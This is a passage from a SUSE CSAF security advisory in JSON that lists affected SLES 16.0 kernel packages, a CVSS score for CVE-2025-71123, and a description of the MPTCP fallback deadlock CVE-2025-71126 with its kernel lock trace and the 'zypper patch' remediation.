"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71123"
},
{
"cve": "CVE-2025-71126",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71126"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: avoid deadlock on fallback while reinjecting\n\nJakub reported an MPTCP deadlock at fallback time:\n\n WARNING: possible recursive locking detected\n 6.18.0-rc7-virtme #1 Not tainted\n --------------------------------------------\n mptcp_connect/20858 is trying to acquire lock:\n ff1100001da18b60 (\u0026msk-\u003efallback_lock){+.-.}-{3:3}, at: __mptcp_try_fallback+0xd8/0x280\n\n but task is already holding lock:\n ff1100001da18b60 (\u0026msk-\u003efallback_lock){+.-.}-{3:3}, at: __mptcp_retrans+0x352/0xaa0\n\n other info that might help us debug this:\n Possible unsafe locking scenario:\n\n CPU0\n ----\n lock(\u0026msk-\u003efallback_lock);\n lock(\u0026msk-\u003efallback_lock);\n\n *** DEADLOCK ***\n\n May be due to missing lock nesting notation\n\n 3 locks held by mptcp_connect/20858:\n #0: ff1100001da18290 (sk_lock-AF_INET){+.+.}-{0:0}, at: mptcp_sendmsg+0x114/0x1bc0\n #1: ff1100001db40fd0 (k-sk_lock-AF_INET#2){+.+.}-{0:0}, at: __mptcp_retrans+0x2cb/0xaa0\n #2: ff1100001da18b60 (\u0026msk-\u003efallback_lock){+.-.}-{3:3}, at: __mptcp_retrans+0x352/0xaa0\n\n stack backtrace:\n CPU: 0 UID: 0 PID: 20858 Comm: mptcp_connect Not tainted 6.18.0-rc7-virtme #1 PREEMPT(full)\n Hardware name: Bochs, BIOS Bochs 01/01/2011\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xa0\n print_deadlock_bug.cold+0xc0/0xcd\n validate_chain+0x2ff/0x5f0\n __lock_acquire+0x34c/0x740\n lock_acquire.part.0+0xbc/0x260\n _raw_spin_lock_bh+0x38/0x50\n __mptcp_try_fallback+0xd8/0x280\n mptcp_sendmsg_frag+0x16c2/0x3050\n __mptcp_retrans+0x421/0xaa0\n mptcp_release_cb+0x5aa/0xa70\n release_sock+0xab/0x1d0\n mptcp_sendmsg+0xd5b/0x1bc0\n sock_write_iter+0x281/0x4d0\n new_sync_write+0x3c5/0x6f0\n vfs_write+0x65e/0xbb0\n ksys_write+0x17e/0x200\n do_syscall_64+0xbb/0xfd0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n RIP: 0033:0x7fa5627cbc5e\n Code: 4d 89 d8 e8 14 bd 00 00 4c 8b 5d f8 41 8b 93 08 03 00 00 59 5e 48 83 f8 fc 74 11 c9 c3 0f 1f 80 00 00 00 00 48 8b 45 10 0f 05 \u003cc9\u003e c3 83 e2 39 83 fa 08 75 e7 e8 13 ff ff ff 0f 1f 00 f3 0f 1e fa\n RSP: 002b:00007fff1fe14700 EFLAGS: 00000202 ORIG_RAX: 0000000000000001\n RAX: ffffffffffffffda RBX: 0000000000000005 RCX: 00007fa5627cbc5e\n RDX: 0000000000001f9c RSI: 00007fff1fe16984 RDI: 0000000000000005\n RBP: 00007fff1fe14710 R08: 0000000000000000 R09: 0000000000000000\n R10: 0000000000000000 R11: 0000000000000202 R12: 00007fff1fe16920\n R13: 0000000000002000 R14: 0000000000001f9c R15: 0000000000001f9c\n\nThe packet scheduler could attempt a reinjection after receiving an\nMP_FAIL and before the infinite map has been transmitted, causing a\ndeadlock since MPTCP needs to do the reinjection atomically from WRT\nfallback.\n\nAddress the issue explicitly avoiding the reinjection in the critical\nscenario. Note that this is the only fallback critical section that\ncould potentially send packets and hit the double-lock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71126",
"url": "https://www.suse.com/security/cve/CVE-2025-71126"
},
{
"category": "external",
"summary": "SUSE Bug 1256755 for CVE-2025-71126",
"url": "https://bugzilla.suse.com/1256755"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
